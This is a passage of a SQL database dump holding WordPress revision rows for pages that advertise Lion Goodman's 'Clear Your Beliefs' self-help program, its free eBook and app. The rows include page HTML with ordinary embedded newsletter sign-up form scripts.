href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:21:27', '2015-05-29 17:21:27', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2190, 2, '2015-05-29 12:19:53', '2015-05-29 17:19:53', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n[/su_box]', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:19:53', '2015-05-29 17:19:53', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(2189, 2, '2015-05-29 12:16:39', '2015-05-29 17:16:39', '<p class="infusion-form"><input name="inf_form_xid" type="hidden" value="fce61116f5a9a85d3022cf39699950ce" /></p>\r\n\r\n<h1 class="infusion-form"><input name="inf_form_name" type="hidden" value="CYB Newsletter Sign Up" /><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center></h1>\r\n\r\n<p style="margin-left: 30px; margin-right: 30px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" class="alignleft size-medium wp-image-1893" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\r\nThis multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.\r\n\r\nYou’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.\r\n<p style="margin-left: 30px; margin-right: 30px;">You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a>  We look forward to staying connected.</p>\r\n<p style="margin-left: 30px; margin-right: 30px;">[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</p>\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></div>\r\n</center> [/su_box]', 'ebook', '', 'inherit', 'open', 'open', '', '1720-revision-v1', '', '', '2015-05-29 12:16:39', '2015-05-29 17:16:39', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1/', 0, 'revision', '', 0),
(1723, 2, '2014-11-12 17:29:44', '2014-11-12 22:29:44', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" />\r\n\r\n\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-11-12 17:29:44', '2014-11-12 22:29:44', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(1721, 2, '2014-11-12 17:27:55', '2014-11-12 22:27:55', '<h1 style="text-align: center;">Here''s how to get your free eBook, "Clear Your Beliefs."</h1>\r\n\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png"><img class="aligncenter size-medium wp-image-1475" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook1.png" alt="ebook" width="1" height="1" /></a>\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-11-12 17:27:55', '2014-11-12 22:27:55', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1722, 2, '2015-05-29 12:47:38', '2015-05-29 17:47:38', '<center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></center>\n\n[su_box title="Free ebook!" box_color="#1a2d8c" radius="8"]\n<div style="margin-left: -15px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class="alignleft size-medium wp-image-1893" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook-201x300.png" alt="Clear-your-beliefs-ebook" width="150" height="225" /></a>We would be delighted to send you a free copy of Lion’s multimedia eBook, <em>“Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life"</em>.</p>\n<p>This multimedia book describes the science and the art of the <em>Clear Your Beliefs</em> process. It offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs.</p><h2><center>Get Lion''s free eBook, <em>Clear Your Beliefs!</em></h2></center><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/ec4d25c4ea7e88210ce7b8c897c925d5"></script></p>\n<p><ul><li>You’ll get an email to confirm your address, then you''ll get immediate access to the downloadable book.</li>\n<li>You will also receive Lion’s periodic newsletter about beliefs, belief-change, and transformation.</li></ul>\n</p>\n<p>If we can ever provide you with answers to your questions, guidance on your path, or good, deep conversation about these topics, please contact us through <a href="http://www.clearyourbeliefs.com/support" target="_blank">www.ClearYourBeliefs.com/support.</a> We look forward to staying connected.</p></div>\n\n<small>[Note: Your contact information will never be shared, and you can un-subscribe anytime.]</small>\n\n</center> [/su_box]\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-autosave-v1', '', '', '2015-05-29 12:47:38', '2015-05-29 17:47:38', '', 1720, 'http://clearyourbeliefs.com/1720-autosave-v1', 0, 'revision', '', 0),
(1724, 2, '2014-11-12 17:31:45', '2014-11-12 22:31:45', '<h1 style="text-align: center;">Here''s how to get your free eBook,\r\n"Clear Your Beliefs."</h1>\r\n\r\n\r\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="202" height="300" class="aligncenter size-medium wp-image-1476" />\r\n\r\n\r\n[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\r\n<center style="margin-top: -25px; margin-bottom: -30px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\r\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\r\n\r\n<div style="margin-left: -15px; margin-bottom: 0px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\r\n</center> [/su_box]\r\n\r\n\r\n', 'ebook', '', 'inherit', 'closed', 'open', '', '1720-revision-v1', '', '', '2014-11-12 17:31:45', '2014-11-12 22:31:45', '', 1720, 'http://clearyourbeliefs.com/1720-revision-v1', 0, 'revision', '', 0),
(1725, 2, '2014-11-12 18:36:56', '2014-11-12 23:36:56', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top:10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 18:36:56', '2014-11-12 23:36:56', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1732, 2, '2014-11-12 21:53:56', '2014-11-13 02:53:56', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 25px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 21:53:56', '2014-11-13 02:53:56', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1726, 2, '2014-11-12 18:39:48', '2014-11-12 23:39:48', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p><p></p>Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 18:39:48', '2014-11-12 23:39:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1727, 2, '2014-11-12 18:40:40', '2014-11-12 23:40:40', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 18:40:40', '2014-11-12 23:40:40', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1730, 2, '2014-11-12 21:24:35', '2014-11-13 02:24:35', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p><p></p>Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates 